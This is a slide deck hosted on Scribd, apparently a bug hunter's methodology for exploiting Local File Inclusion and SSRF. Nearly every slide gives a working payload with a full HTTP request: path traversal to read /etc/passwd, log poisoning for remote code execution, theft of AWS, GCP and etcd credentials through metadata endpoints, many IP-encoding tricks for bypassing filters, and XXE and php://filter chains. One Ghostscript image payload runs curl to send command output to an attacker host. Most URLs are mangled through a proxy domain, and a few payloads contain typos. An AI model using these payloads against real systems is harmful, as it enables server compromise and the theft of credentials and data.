Scribd
Upload
3 views

Interaction-File-URL

The document outlines various methodologies for exploiting Local File Inclusion (LFI) and Server-Side Request Forgery (SSRF) vulnerabilities. It provides specific injection techniques and payload examples to access sensitive files and internal services. The techniques include manipulating URLs, using different encoding methods, and bypassing blacklists to extract data from servers.

Uploaded by

PUBG BATTLEGROUND INDIA OFFICAL
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
3 views

Interaction-File-URL

The document outlines various methodologies for exploiting Local File Inclusion (LFI) and Server-Side Request Forgery (SSRF) vulnerabilities. It provides specific injection techniques and payload examples to access sensitive files and internal services. The techniques include manipulating URLs, using different encoding methods, and bypassing blacklists to extract data from servers.

Uploaded by

PUBG BATTLEGROUND INDIA OFFICAL
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 61

Interaction

File - URL
https://www.company.com

Mahmoud M. Awali
@0xAwali
My Methodology

attacker

Try To Inject ../../../../../etc/passwd OR %252fetc%252fpasswd To Get Content Of


etc/passwd If There Is LFI

● Blog
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Blog User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
● Blog Referer: https://previous.com/path
Origin: https://www.company.com
● Writeup Content-Length: Number

File-URL=../../../../../etc/passwd
My Methodology

attacker

Use Chineese Separator %E3%80%82 Instead Of DOT e.g.


%E3%80%82%E3%80%82/etc/passwd To Get Content Of etc/passwd

● Tweet
My Methodology

attacker

Try To Inject ../../../../../etc/passwd%00 To Get Content Of etc/passwd If There Is LFI

● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=../../../../../etc/passwd%00
My Methodology

attacker

Try To Inject ../../../../../proc/self/fd/Number-FUZZ With Referer Header


<?php system('id');?> To Get RCE

● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: <?php system('id');?>
Origin: https://www.company.com
Content-Length: Number

File-URL=../../../../../proc/self/fd/Number-FUZZ
My Methodology

attacker

Try To Inject jsp/etc/../../WEB-INF/web.xml To Get DB Configuration Files


If There Is LFI

● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=jsp/etc/../../WEB-INF/web.xml
My Methodology

attacker

Try To Inject https://id.burpcollaborator.net To Get Full Request If There Is SSRF

● Blog
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
● Writeup Referer: https://previous.com/path
Origin: https://www.company.com
● Writeup Content-Length: Number

File-URL=https://id.burpcollaborator.net
My Methodology

attacker

Try To Append # OR %0d%0aX:%20 To Your Domain e.g.


https://id.burpcollaborator.net# To Bypass Appending Anything After URL

● Tweet
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=https://id.burpcollaborator.net#
My Methodology

attacker

Try To Inject file:///etc/passwd To Get Content Of etc/passwd If There Is SSRF

● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
● Writeup Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=file:///etc/passwd
My Methodology

attacker

Try To Inject file:///etc/./passwd To Get Content Of etc/passwd If There Is SSRF

● Tweet
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Blog User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=file:///etc/./passwd
My Methodology

attacker

Try To Inject file://\/\/etc/passwd To Get Content Of etc/passwd If There Is SSRF

● Tweet
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=file://\/\/etc/passwd
My Methodology

attacker

Try To Inject view-source:file:///etc/passwd To Get Content Of etc/passwd


If There Is SSRF

● Tweet
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=view-source:file:///etc/passwd
My Methodology

attacker

Try To Inject http://127.0.0.1:PORT To Get Internal Services

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
● Writeup Referer: https://previous.com/path
Origin: https://www.company.com
● Writeup Content-Length: Number

File-URL=http://127.0.0.1:PORT
● Writeup
My Methodology

attacker

Try To Inject http://169.254.169.254/latest/user-data To Extract User data

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Blog User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://169.254.169.254/latest/user-data
My Methodology

attacker

Try To Inject http://169.254.169.254/latest/meta-data/iam/security-credentials/ To


Extract Temporary AWS Credentials

● Video POST /Interaction-File-URL HTTP/1.1


Host: www.company.com
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
● Tweet Origin: https://www.company.com
Content-Length: Number
● Writeup
File-URL=http://169.254.169.254/latest/meta-data/iam/security-cred
● Writeup entials/
My Methodology

attacker

Try To Inject http://100.100.100.200/latest/meta-data/ OR


http://127.0.0.1:2379/v2/keys/?recursive=true To Extract Credentials

● Resource
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://127.0.0.1:2379/v2/keys/?recursive=true
My Methodology

attacker

Try To Inject https://kubernetes.default.svc/metrics To Extract Kubernetes API

● Tweet
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=https://kubernetes.default.svc/metrics
My Methodology

attacker

Try To Inject http://metadata.google.internal/computeMetadata/v1beta1/?


recursive=true To Grab All Internal Metadata

● Tweet POST /Interaction-File-URL HTTP/1.1


Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=https://metadata.google.internal/computeMetadata/v1be
ta1/?recursive=true
My Methodology

attacker

Try To Use 169.254.169.254.xip.io Instead Of 169.254.169.254 To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://169.254.169.254.xip.io/latest/user-data
My Methodology

attacker

Try To Use base36(int('254.169.254.169')) e.g. http://1ynrnhl.xip.io/ Instead Of


169.254.169.254 To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://1ynrnhl.xip.io/latest/user-data
My Methodology

attacker

Try To Use http://www.company.com.1ynrnhl.xip.io/ Instead Of 169.254.169.254 To


Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://www.company.com1ynrnhl.xip.io/latest/user-data
My Methodology

attacker

Try To Change The HTTP Version From 1.1 To HTTP/0.9 And Remove The Host
Header To Bypass Blacklist

● Tweet POST /Interaction-File-URL HTTP/0.9


Host: www.company.com
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://169.254.169.254/latest/meta-data/iam/security-cred
entials/
My Methodology

attacker

Try To Drop The Zeros e.g. http://127.0.0.1 → http://127.1 To Bypass Blacklist

● Tweet
My Methodology

attacker

Try To Add Extra Zeros e.g. https://127.000.000.00000000001 To Bypass Blacklist

● Tweet
My Methodology

attacker

Try To Use Dotted Decimal With Overflow e.g. http://425.510.425.510/ To Bypass


Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://425.510.425.510/
My Methodology

attacker

Try To Use Dotless Decimal e.g. http://2852039166/ To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://2852039166/
My Methodology

attacker

Try To Use Dotless Decimal With Overflow e.g. http://7147006462/ To Bypass


Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://7147006462/
My Methodology

attacker

Try To Use Dotted Hexadecimal e.g. http://0xA9.0xFE.0xA9.0xFE/ To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://0xA9.0xFE.0xA9.0xFE/
My Methodology

attacker

Try To Use Dotless Hexadecimal e.g. http://0xA9FEA9FE/ To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://0xA9FEA9FE/
My Methodology

attacker

Try To Use Dotless Hexadecimal With Overflow e.g. http://0x41414141A9FEA9FE/ To


Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://0x41414141A9FEA9FE/
My Methodology

attacker

Try To Use Dotted Octal e.g. http://0251.0376.0251.0376/ To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://0251.0376.0251.0376/
My Methodology

attacker

Try To Use Dotted Octal With Padding e.g. http://0251.00376.000251.0000376/ To


Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://0251.00376.000251.0000376/
My Methodology

attacker

Try To Mix Them e.g. Decimal Overflow + Hex + Octal e.g. http://425.254.0xa9.0376/
To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://425.254.0xa9.0376/
My Methodology

attacker

Try To Convert Only Parts Of The Address e.g. Octal + Hex + 2-Byte Wide Dotless
Decimal e.g. http://0251.0xfe.43518/ OR https://0251.254.169.254 To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://0251.0xfe.43518/
My Methodology

attacker

Try To Use IPv4-Compatible Address e.g. http://[::169.254.169.254]/ To Bypass


Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://[::169.254.169.254]/
My Methodology

attacker

Try To Use IPv4-Mapped Address e.g. http://[::ffff:169.254.169.254]/ To Bypass


Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://[::ffff:169.254.169.254]/
My Methodology

attacker

Try To Use http://127.127.127.127 To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://127.127.127.127.127/
My Methodology

attacker

Try To Use http://0.0.0.0:PORT To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://0.0.0..0:PORT/
My Methodology

attacker

Try To Use http://[::1]:PORT e.g. http://[::1]:2375/containers/json OR http://[::] To


Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
● Writeup Referer: https://previous.com/path
Origin: https://www.company.com
● Writeup Content-Length: Number

File-URL=http://[::1]:2375/containers/json
● Writeup
My Methodology

attacker

Try To Use HTTP Redirection To Bypass Blacklist e.g.


http://nicob.net/redir-http-I.P.v.4:PORT Will Redirect You To I.P.v.4:PORT

● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://nicob.net/redir-http-I.P.v.4:PORT
List Of Patterns To Bypass The Whitelist

attacker
http://google.com:80+&@127.88.23.245:22/#[email protected]:80/
http://127.88.23.245:22/+&@google.com:80#[email protected]:80/
http://google.com:80+&@google.com:80#[email protected]:22/
http://127.88.23.245:22/[email protected]:80/
http://127.88.23.245:22/#@www.google.com:80/
http://google.com:80\\@127.88.23.245:22
http://127.1.1.1:80\@127.2.2.2:80/
http://127.1.1.1:80\@@127.2.2.2:80/
http://127.1.1.1:80:\@@127.2.2.2:80/
● Tweet http://127.1.1.1:80#\@127.2.2.2:80/
http://169。254。169。254/
http://169。254。169。254/

● Video http://⑯⑨。②⑤④。⑯⑨。②⑤④/
http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ :80/
http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
http://②⑧⑤②⓪③⑨①⑥⑥:80/
● Payloads http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥ :80/
http://⓪⓪②⑤①。⓪⓪⓪③⑦⑥。⓪⓪⓪⓪②⑤①。⓪⓪⓪⓪⓪③⑦⑥ :80/
http://[::①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/
http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/
http://⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧ :80/
http://⓪ⓧⓐ⑨。⑯⑥⑧⑨⑥⑥②:80/
http://⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80/
http://⓪⓪②⑤①。⓪ⓧⓕⓔ。④③⑤①⑧ :80/
My Methodology

attacker

Try To Use http://www.company.com# @me.com To Bypass Blacklist

● Slides
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://www.company.com# @me.com
My Methodology

attacker

Try To Use Protocol Wrappers Other Than Http OR HTTPS e.g. SSH , SFTP , POP3 ,
IMAP , SMTP , FTP , DICT , GOPHER OR TFTP e.g. sftp://me.com To Bypass Blacklist

● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=sftp://me.com
Try To Use This Payload

attacker

POST /Interaction-File-URL HTTP/1.1


Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
● Slides Content-Length: Number

File-URL=php://filter/convert.iconv.WINDOWS-936%2FCP1388|con
vert.base64-encode|convert.base64-encode|convert.iconv.UTF8%
2FIBM4899%2F%2FTRANSLIT|convert.base64-encode|convert.ba
se64-encode|convert.base64-encode|convert.iconv.UTF8%2FIBM4
899%2F%2FTRANSLIT|convert.quoted-printable-encode|convert.i
conv.WINDOWS-936%2FCP1388/resource=/etc/passwd%20#@%2
0read/resource=file:///etc/passwd
Try To Use This Payload

attacker

POST /Interaction-File-URL HTTP/1.1


Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
● Slides Content-Length: Number

File-URL=php://filter/convert.iconv.WINDOWS-936%2FCP1388|con
vert.base64-encode|convert.base64-encode|convert.iconv.UTF8%
2FIBM4899%2F%2FTRANSLIT|convert.base64-encode|convert.ba
se64-encode|convert.base64-encode|convert.iconv.UTF8%2FIBM4
899%2F%2FTRANSLIT|convert.quoted-printable-encode|convert.i
conv.WINDOWS-936%2FCP1388/resource=/etc/passwd%20#@%2
0read/resource=file:///etc/passwd%20#[]@%20127.0.0.1:1337/inde
x.php?url=file:///etc/passwd
My Methodology

attacker

If You Got Blind SSRF Over HTTP OR HTTPS , Try To Request The Unresolvable
Subdomains Because There Are Reachable Subdomains Over Only VPN

● Tweet
My Methodology

attacker

If You Got Blind SSRF Over HTTP OR HTTPS , Try To Request An Internal URL That
Performs Another SSRF That Calls Out To Your Domain e.g. Apache Solr Is Running Internally

● Blog POST /Interaction-File-URL HTTP/1.1


Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://apache-solr.company.com/solr/gettingstarted/sele
ct?q={!xmlparser v='<!DOCTYPE a SYSTEM
"http://me.com/"'><a></a>'
My Methodology

attacker

If There Is ASP.NET Try To Inject .+./.+./web.config OR


http:// 127.0.0.1:[0-65535]/[Home|Admin|Administrator]/Index? To Get Admin Page

● Slides
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Blog User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http:// 127.0.0.1:PORT/Home/Index?
Reading From Remote XML File

attacker

root@mine:~#cat file.xml
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY read SYSTEM "file:///etc/passwd">
]>
<root><email>&read;</email></root>

POST /Interaction-File-URL HTTP/1.1


● Slides Host: www.company.com
User-Agent: Mozilla/5.0
● Tweet Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
● Writeup Origin: https://www.company.com
Content-Length: Number

File-URL=https://me.com/file.xml
Reading From Remote mp4 File

attacker

root@mine:~#cat file.mp4
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://me.com/2.mp4
#EXT-X-ENDLIST

POST /Interaction-File-URL HTTP/1.1


● Writeup Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=https://me.com/file.mp4
Reading From Remote Image

attacker

root@mine:~#cat file.jpg
%!PS
userdict /setpagedevice undef
Save
Legal
{null restore} stopped {pop} if
{legal} stopped {pop} if
Restore
mark /OutputFile (%pipe%curl${IFS}me.com/`id`)
currentdevice putdeviceprops

● Blog
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=https://me.com/file.jpg
Interaction With Remote URL

attacker

root@mine:~#cat index.php
<?php
header("Location: http://[::]:22/");
?>

POST /Interaction-File-URL HTTP/1.1


● Writeup Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=https://me.com/index.php
Interaction With Remote URL II

attacker

root@mine:~#cat index.php
<?php
header("Location: http://169.254.169.254/latest/meta-data/", TRUE, 303);
?>

POST /Interaction-File-URL HTTP/1.1


● Writeup Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=https://me.com/index.php
Interaction With Remote URL III

attacker

Steps to produce :-

1 - Try To Set Your Domain e.g. http://me.com As


● Writeup Remote URL And Run Wireshark On It
2 - If There Is Range OR Content-Range Header
3 - Try To Response With e.g. Bytes 2M AND
Upload File Less Than Bytes 2M On http://me.com
4 - The Company Will Rerequest The Rest Of Bytes 2M
5 - Try To Redirect Second Request To e.g.
http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
My Methodology

attacker

If There Is SSRF Try To Inject http://brutelogic.com.br/poc.svg To Get XSS

● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://brutelogic.com.br/poc.svg
My Methodology

attacker

